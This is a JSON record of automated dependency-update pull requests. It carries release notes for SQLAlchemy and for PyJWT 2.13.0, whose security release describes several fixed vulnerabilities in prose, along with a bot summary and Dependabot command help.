\u003ccode\u003eSessionEvents.do_orm_execute()\u003c/code\u003e\nevent hook would cause internal execution options such as \u003ccode\u003eyield_per\u003c/code\u003e and\nloader-specific state from the first \u003ccode\u003eorm_pre_session_exec\u003c/code\u003e pass to leak\ninto the second pass, leading to errors when using relationship loaders\nsuch as \u003ccode\u003eselectinload()\u003c/code\u003e and \u003ccode\u003eimmediateload()\u003c/code\u003e.  The execution\noptions passed to the second compilation pass are now based on the original\noptions plus only the explicit updates made via\n\u003ccode\u003eORMExecuteState.update_execution_options()\u003c/code\u003e within the event hook.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13301\"\u003e#13301\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[orm] [bug]\u003c/strong\u003e Fixed issue where using \u003ccode\u003e_orm.with_polymorphic()\u003c/code\u003e on a leaf class (a\nsubclass with no further descendants) or a non-inherited class would fail\nwith an \u003ccode\u003eAttributeError\u003c/code\u003e when used in an ORM statement, due to\n\u003ccode\u003e_orm.configure_mappers()\u003c/code\u003e not being triggered implicitly. The fix\nensures that \u003ccode\u003eAliasedInsp\u003c/code\u003e participates in the \u003ccode\u003e_post_inspect\u003c/code\u003e\nhook, triggering mapper configuration during ORM statement compilation.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/13319\"\u003e#13319\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003esql\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e[sql] [bug]\u003c/strong\u003e Fixed issue where floor division (\u003ccode\u003e//\u003c/code\u003e) between a \u003ccode\u003eFloat\u003c/code\u003e or\n\u003ccode\u003eNumeric\u003c/code\u003e numerator and an \u003ccode\u003eInteger\u003c/code\u003e denominator would omit\nthe \u003ccode\u003eFLOOR()\u003c/code\u003e SQL wrapper on dialects where\n\u003ccode\u003eDialect.div_is_floordiv\u003c/code\u003e is \u003ccode\u003eTrue\u003c/code\u003e (the default, including\nPostgreSQL and SQLite).  \u003ccode\u003eFLOOR()\u003c/code\u003e is now applied if either the\ndenominator or the numerator is a non-integer, so that expressions such as\n\u003ccode\u003efloat_col // int_col\u003c/code\u003e render as \u003ccode\u003eFLOOR(float_col / int_col)\u003c/code\u003e instead\nof the incorrect \u003ccode\u003efloat_col / int_col\u003c/code\u003e.  Pull request courtesy r266-tech.\u003c/p\u003e\n\u003cp\u003eReferences: \u003ca href=\"https://www.sqlalchemy.org/trac/ticket/10528\"\u003e#10528\u003c/a\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003epostgresql\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/sqlalchemy/sqlalchemy/commits\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `pyjwt` from 2.12.1 to 2.13.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + me...\n\n_Description has been truncated_\n\n\u003c!-- This is an auto-generated description by cubic. --\u003e\n---\n## Summary by cubic\nUpdate backend dependencies to current patch/minor versions for security and stability. Highlights include `fastapi` 0.136.3, `uvicorn` 0.49.0, and `PyJWT` 2.13.0.\n\n- **Dependencies**\n  - Runtime: `fastapi` 0.136.3, `uvicorn` 0.49.0, `PyJWT` 2.13.0, `pydantic-settings` 2.14.1, `sqlalchemy` 2.0.50, `python-multipart` 0.0.32, `redis` 7.4.1, `sentry-sdk` 2.62.0, `webauthn` 2.8.0, `reportlab` 4.5.1.\n  - Tooling/tests: `ruff` 0.15.17, `mypy` 1.20.2, `coverage` 7.14.1, `pip-audit` 2.10.1, `pytest` 9.1.0.\n  - Notable changes:\n    - `PyJWT` 2.13.0 includes multiple security fixes and stricter algorithm checks.\n    - `fastapi` now rejects underscore headers when `convert_underscores=True` (default) and validates SSE fields.\n    - `uvicorn` consumes duplicate forwarding headers and requires `httptools` ≥ 0.8.0.\n\n- **Migration**\n  - Ensure clients and proxies send header names with dashes, not underscores (e.g., `X-Custom-Header`).\n  - If behind proxies using multiple `X-Forwarded-*` headers, verify client IP/port handling with `ProxyHeadersMiddleware`.\n  - Confirm JWT verification paths pass an explicit `algorithms=[...]` list and work with `PyJWK`/`PyJWKClient`.\n  - Reinstall deps: `pip install -r backend/requirements.txt` and `-r backend/requirements-ci.txt`. Run tests.\n\n\u003csup\u003eWritten for commit 6a6e38e56aa87a35ef257d8afe32876efbc8f062. Summary will update on new commits.\u003c/sup\u003e\n\n\u003ca href=\"https://cubic.dev/pr/Prekzursil/momentstudio/pull/585?utm_source=github\" target=\"_blank\" rel=\"noopener noreferrer\" data-no-image-dialog=\"true\"\u003e\u003cpicture\u003e\u003csource media=\"(prefers-color-scheme: dark)\" srcset=\"https://www.cubic.dev/buttons/review-in-cubic-dark.svg\"\u003e\u003csource media=\"(prefers-color-scheme: light)\" srcset=\"https://www.cubic.dev/buttons/review-in-cubic-light.svg\"\u003e\u003cimg alt=\"Review in cubic\" src=\"https://www.cubic.dev/buttons/review-in-cubic-dark.svg\"\u003e\u003c/picture\u003e\u003c/a\u003e\n\n\u003c!-- End of auto-generated description by cubic. --\u003e\n\n","html_url":"https://github.com/Prekzursil/momentstudio/pull/585","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Prekzursil%2Fmomentstudio/issues/585","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/585/packages"}},{"old_version":"\u003e=2.12.1","new_version":"\u003e=2.13.0","update_type":"minor","path":"/apps/counselconduit","pr_created_at":"2026-06-12T20:35:37.000Z","version_change":"\u003e=2.12.1 → \u003e=2.13.0","issue":{"uuid":"4652439820","node_id":"PR_kwDOSZI7Z87l6y3p","number":348,"state":"open","title":"chore(deps): update pyjwt requirement from \u003e=2.12.1 to \u003e=2.13.0 in /apps/counselconduit","user":"dependabot[bot]","labels":["dependencies"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":null,"author_association":null,"state_reason":null,"created_at":"2026-06-12T20:35:37.000Z","updated_at":"2026-06-12T20:35:38.000Z","time_to_close":null,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"chore(deps): update","packages":[{"name":"pyjwt","old_version":"\u003e=2.12.1","new_version":"\u003e=2.13.0","repository_url":"https://github.com/jpadilla/pyjwt"}],"path":"/apps/counselconduit","ecosystem":"pip"},"body":"Updates the requirements on [pyjwt](https://github.com/jpadilla/pyjwt) to permit the latest version.\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/releases\"\u003epyjwt's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e2.13.0\u003c/h2\u003e\n\u003ch1\u003ePyJWT 2.13.0 — Security Release\u003c/h1\u003e\n\u003cp\u003eThis release bundles five security fixes plus three additional hardening / spec-compliance changes. We recommend all users upgrade.\u003c/p\u003e\n\u003ch2\u003eSecurity\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\"\u003e\u003ccode\u003eGHSA-xgmm-8j9v-c9wx\u003c/code\u003e\u003c/a\u003e — JWK JSON accepted as HMAC secret (algorithm confusion).\u003c/strong\u003e \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e previously rejected PEM- and SSH-formatted asymmetric keys but did not catch a JWK passed as a raw JSON string. In a verifier configured with both symmetric and asymmetric algorithms in \u003ccode\u003ealgorithms=[…]\u003c/code\u003e and a raw-JSON JWK as the key, an attacker could forge HS256 tokens using the JWK text as the HMAC secret. The guard has been extended to reject any JWK-shaped JSON. \u003cem\u003eReported by \u003ca href=\"https://github.com/aradona91\"\u003e\u003ccode\u003e@​aradona91\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\"\u003e\u003ccode\u003eGHSA-jq35-7prp-9v3f\u003c/code\u003e\u003c/a\u003e — Algorithm allow-list bypass with \u003ccode\u003ePyJWK\u003c/code\u003e / \u003ccode\u003ePyJWKClient\u003c/code\u003e.\u003c/strong\u003e When verifying with a \u003ccode\u003ePyJWK\u003c/code\u003e, the caller's \u003ccode\u003ealgorithms=[…]\u003c/code\u003e allow-list was checked against the token header \u003ccode\u003ealg\u003c/code\u003e as a string only; actual verification used the algorithm bound to the \u003ccode\u003ePyJWK\u003c/code\u003e. An attacker who controlled a registered JWKS key could sign with one algorithm and advertise another on the header. PyJWT now requires the token header \u003ccode\u003ealg\u003c/code\u003e to match the \u003ccode\u003ePyJWK\u003c/code\u003e's algorithm before verification. \u003cem\u003eReported by \u003ca href=\"https://github.com/sushi-gif\"\u003e\u003ccode\u003e@​sushi-gif\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\"\u003e\u003ccode\u003eGHSA-w7vc-732c-9m39\u003c/code\u003e\u003c/a\u003e — DoS via base64 decode of unused payload segment when \u003ccode\u003eb64=false\u003c/code\u003e.\u003c/strong\u003e For detached-payload JWS (\u003ccode\u003eb64=false\u003c/code\u003e), the compact-form payload segment was base64-decoded before being discarded in favor of the caller-supplied \u003ccode\u003edetached_payload\u003c/code\u003e. An attacker could inflate the unused segment to force CPU + memory cost without holding a valid signature. The segment is now required to be empty per RFC 7515 Appendix F, and is no longer decoded. \u003cem\u003eReported by \u003ca href=\"https://github.com/thesmartshadow\"\u003e\u003ccode\u003e@​thesmartshadow\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\"\u003e\u003ccode\u003eGHSA-993g-76c3-p5m4\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e accepts non-HTTP(S) URIs.\u003c/strong\u003e \u003ccode\u003ePyJWKClient.fetch_data\u003c/code\u003e passed its URI to \u003ccode\u003eurllib.request.urlopen\u003c/code\u003e, which by default also handles \u003ccode\u003efile://\u003c/code\u003e, \u003ccode\u003eftp://\u003c/code\u003e, and \u003ccode\u003edata:\u003c/code\u003e schemes. An application that fed an attacker-influenced URI into \u003ccode\u003ePyJWKClient\u003c/code\u003e could be coerced into reading local files or reaching other unintended schemes. \u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects any URI whose scheme isn't \u003ccode\u003ehttp\u003c/code\u003e or \u003ccode\u003ehttps\u003c/code\u003e. \u003cem\u003eReported by \u003ca href=\"https://github.com/KEIJOT\"\u003e\u003ccode\u003e@​KEIJOT\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003cstrong\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\"\u003e\u003ccode\u003eGHSA-fhv5-28vv-h8m8\u003c/code\u003e\u003c/a\u003e — \u003ccode\u003ePyJWKClient\u003c/code\u003e cache wiped on fetch error.\u003c/strong\u003e A \u003ccode\u003efinally\u003c/code\u003e-block \u003ccode\u003eput(jwk_set=None)\u003c/code\u003e cleared the JWK Set cache whenever a fetch raised, turning a transient JWKS-endpoint outage into application-wide auth failure. The cache write was moved into the success path; transient errors no longer evict valid cached keys. \u003cem\u003eReported by \u003ca href=\"https://github.com/eddieran\"\u003e\u003ccode\u003e@​eddieran\u003c/code\u003e\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eFixed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eReject empty HMAC keys outright in \u003ccode\u003eHMACAlgorithm.prepare_key\u003c/code\u003e with \u003ccode\u003eInvalidKeyError\u003c/code\u003e instead of accepting them with only a warning. Defends against the \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e footgun. \u003cem\u003eThanks to \u003ca href=\"https://github.com/SnailSploit\"\u003e\u003ccode\u003e@​SnailSploit\u003c/code\u003e\u003c/a\u003e and \u003ca href=\"https://github.com/spartan8806\"\u003e\u003ccode\u003e@​spartan8806\u003c/code\u003e\u003c/a\u003e for the reports.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003eForward per-call \u003ccode\u003eoptions\u003c/code\u003e (including \u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e) from \u003ccode\u003ePyJWT.decode\u003c/code\u003e through to \u003ccode\u003ePyJWS._verify_signature\u003c/code\u003e. The option was previously silently dropped between the two layers, so it only took effect when set on the \u003ccode\u003ePyJWT\u003c/code\u003e instance. \u003cem\u003eThanks to \u003ca href=\"https://github.com/WLUB\"\u003e\u003ccode\u003e@​WLUB\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eRFC 7797 §3 compliance for \u003ccode\u003eb64=false\u003c/code\u003e:\u003c/strong\u003e the encoder now auto-adds \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e to \u003ccode\u003ecrit\u003c/code\u003e, and the decoder rejects tokens that set \u003ccode\u003eb64=false\u003c/code\u003e without listing it in \u003ccode\u003ecrit\u003c/code\u003e. \u003cem\u003eThanks to \u003ca href=\"https://github.com/MachineLearning-Nerd\"\u003e\u003ccode\u003e@​MachineLearning-Nerd\u003c/code\u003e\u003c/a\u003e for the report.\u003c/em\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eChanged\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups, by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/pull/1152\"\u003e#1152\u003c/a\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eUpgrade notes\u003c/h2\u003e\n\u003cp\u003eMost fixes are invisible to correctly-configured callers. A few behavioral changes you may encounter:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eEmpty HMAC keys now raise.\u003c/strong\u003e If your app passed \u003ccode\u003e\u0026quot;\u0026quot;\u003c/code\u003e or \u003ccode\u003eb\u0026quot;\u0026quot;\u003c/code\u003e as a secret (often via a missing env var, e.g. \u003ccode\u003eos.getenv(\u0026quot;JWT_SECRET\u0026quot;, \u0026quot;\u0026quot;)\u003c/code\u003e), \u003ccode\u003eencode\u003c/code\u003e/\u003ccode\u003edecode\u003c/code\u003e will now raise \u003ccode\u003eInvalidKeyError\u003c/code\u003e. This is the intended behavior — fix the configuration.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWK\u003c/code\u003e decoding now requires the token's \u003ccode\u003ealg\u003c/code\u003e to match the JWK's algorithm.\u003c/strong\u003e Previously a mismatch was silently honored if the header \u003ccode\u003ealg\u003c/code\u003e appeared in the allow-list. Tokens that relied on this mismatch will now fail with \u003ccode\u003eInvalidAlgorithmError\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003ePyJWKClient\u003c/code\u003e now rejects non-HTTP(S) URIs at construction time.\u003c/strong\u003e Tests or dev environments that fetched JWKS from \u003ccode\u003efile://\u003c/code\u003e URIs need to switch to a local HTTP server or load the JWKS by other means (e.g. construct \u003ccode\u003ePyJWKSet.from_dict(...)\u003c/code\u003e directly).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eb64=false\u003c/code\u003e tokens are now strictly RFC 7515 / 7797 compliant.\u003c/strong\u003e Tokens with a non-empty compact-form payload segment, or that omit \u003ccode\u003e\u0026quot;b64\u0026quot;\u003c/code\u003e from \u003ccode\u003ecrit\u003c/code\u003e, will be rejected. PyJWT-produced tokens always satisfy both invariants, so round-trips through PyJWT are unaffected.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003e\u003ccode\u003eenforce_minimum_key_length\u003c/code\u003e set per-call now takes effect.\u003c/strong\u003e Callers who passed \u003ccode\u003eoptions={\u0026quot;enforce_minimum_key_length\u0026quot;: True}\u003c/code\u003e to \u003ccode\u003ejwt.decode()\u003c/code\u003e previously got no enforcement; they will now get \u003ccode\u003eInvalidKeyError\u003c/code\u003e on undersized keys, as documented.\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull changelog:\u003c/strong\u003e \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ehttps://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/jpadilla/pyjwt/blob/master/CHANGELOG.rst\"\u003epyjwt's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003ccode\u003ev2.13.0 \u0026lt;https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\u0026gt;\u003c/code\u003e__\u003c/h2\u003e\n\u003cp\u003eSecurity\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject JWK JSON documents passed as raw HMAC secrets in\n  ``HMACAlgorithm.prepare_key`` to close an algorithm-confusion gap that\n  the existing PEM/SSH guard did not cover. Reported by @aradona91 in\n  `GHSA-xgmm-8j9v-c9wx \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-xgmm-8j9v-c9wx\u0026gt;`__.\n- Bind the JWT header ``alg`` to ``PyJWK.algorithm_name`` during\n  verification so the caller's ``algorithms=[...]`` allow-list cannot be\n  bypassed when decoding with a ``PyJWK`` / ``PyJWKClient`` key. Reported\n  by @sushi-gif in `GHSA-jq35-7prp-9v3f \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-jq35-7prp-9v3f\u0026gt;`__.\n- Reject non-``http(s)`` URI schemes in ``PyJWKClient`` so attacker-\n  influenced URIs cannot read local files or reach unintended schemes via\n  urllib's default ``file://`` / ``ftp://`` / ``data:`` handlers. Reported\n  by @KEIJOT in `GHSA-993g-76c3-p5m4 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-993g-76c3-p5m4\u0026gt;`__.\n- Preserve the cached JWK Set on fetch errors in ``PyJWKClient.fetch_data``.\n  The previous ``finally``-block ``put(None)`` pattern cleared the cache\n  on any transient outage, turning one bad JWKS request into application-\n  wide auth failure. Reported by @eddieran in `GHSA-fhv5-28vv-h8m8 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-fhv5-28vv-h8m8\u0026gt;`__.\n- Skip the unconditional base64 decode of the compact-form payload segment\n  when ``b64=false`` is set in the protected header, and require that\n  segment to be empty (RFC 7515 Appendix F detached form). Closes an\n  unauthenticated DoS amplifier. Reported by @thesmartshadow in\n  `GHSA-w7vc-732c-9m39 \u0026lt;https://github.com/jpadilla/pyjwt/security/advisories/GHSA-w7vc-732c-9m39\u0026gt;`__.\n\u003cp\u003eFixed\u003c/p\u003e\n\u003cpre\u003e\u003ccode\u003e\n- Reject empty HMAC keys outright in ``HMACAlgorithm.prepare_key`` with\n  ``InvalidKeyError`` instead of accepting them with only a warning.\n  Thanks to @SnailSploit and @spartan8806 for independently flagging the\n  footgun.\n- Forward per-call ``options`` (including ``enforce_minimum_key_length``)\n  from ``PyJWT.decode`` through to ``PyJWS._verify_signature`` so the\n  option actually takes effect when set at the call site rather than only\n  on the ``PyJWT`` instance. Thanks to @WLUB for the report.\n- RFC 7797 §3 compliance for ``b64=false``: the encoder now auto-adds\n  ``\u0026amp;quot;b64\u0026amp;quot;`` to the ``crit`` header parameter, and the decoder rejects\n  tokens that set ``b64=false`` without listing it in ``crit``. Thanks to\n  @MachineLearning-Nerd for the report.\n\nChanged\n\u003c/code\u003e\u003c/pre\u003e\n\u003cul\u003e\n\u003cli\u003eMigrate the \u003ccode\u003edev\u003c/code\u003e, \u003ccode\u003edocs\u003c/code\u003e, and \u003ccode\u003etests\u003c/code\u003e package extras to dependency groups by \u003ca href=\"https://github.com/kurtmckee\"\u003e\u003ccode\u003e@​kurtmckee\u003c/code\u003e\u003c/a\u003e in \u003ccode\u003e[#1152](https://github.com/jpadilla/pyjwt/issues/1152) \u0026amp;lt;https://github.com/jpadilla/pyjwt/pull/1152\u0026amp;gt;\u003c/code\u003e__\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ccode\u003ev2.12.1 \u0026amp;lt;https://github.com/jpadilla/pyjwt/compare/2.12.0...2.12.1\u0026amp;gt;\u003c/code\u003e__\n\u0026lt;/tr\u0026gt;\u0026lt;/table\u0026gt;\n\u003c/code\u003e\u003c/pre\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/7144e4534c34810f4525dc4578a32addd8212cff\"\u003e\u003ccode\u003e7144e45\u003c/code\u003e\u003c/a\u003e Apply ruff format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/d2f4bec4963897c0ef96ef64a875894f2c8542ab\"\u003e\u003ccode\u003ed2f4bec\u003c/code\u003e\u003c/a\u003e Restore \u003ccode\u003ecast()\u003c/code\u003e calls with cross-version \u003ccode\u003etype: ignore\u003c/code\u003e for \u003ccode\u003eprepare_key\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/22f478cebddd8294259c30f037ecb92b0b348774\"\u003e\u003ccode\u003e22f478c\u003c/code\u003e\u003c/a\u003e Remove redundant casts in \u003ccode\u003eRSAAlgorithm.prepare_key\u003c/code\u003e and `ECAlgorithm.prepare...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/95791b1759b8aa4f2203575d344d5c78564cdc81\"\u003e\u003ccode\u003e95791b1\u003c/code\u003e\u003c/a\u003e Bundle security fixes and hardening into 2.13.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/dcc27a9d3182a2349c30b160758785c6ce7a6508\"\u003e\u003ccode\u003edcc27a9\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1155\"\u003e#1155\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/9d08a9a1896845ed8eaf88e6f6ac61e5800c3e7a\"\u003e\u003ccode\u003e9d08a9a\u003c/code\u003e\u003c/a\u003e [pre-commit.ci] pre-commit autoupdate (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1146\"\u003e#1146\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/b87c10014d4109f0214fea188d00faaaf8a80e64\"\u003e\u003ccode\u003eb87c100\u003c/code\u003e\u003c/a\u003e Bump codecov/codecov-action from 5 to 6 (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1154\"\u003e#1154\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/jpadilla/pyjwt/commit/40e3147eb5f790d8d041772e5fc00728a176c812\"\u003e\u003ccode\u003e40e3147\u003c/code\u003e\u003c/a\u003e Migrate development extras to dependency groups (\u003ca href=\"https://redirect.github.com/jpadilla/pyjwt/issues/1152\"\u003e#1152\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/jpadilla/pyjwt/compare/2.12.1...2.13.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore this major version` will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this minor version` will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)\n- `@dependabot ignore this dependency` will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it 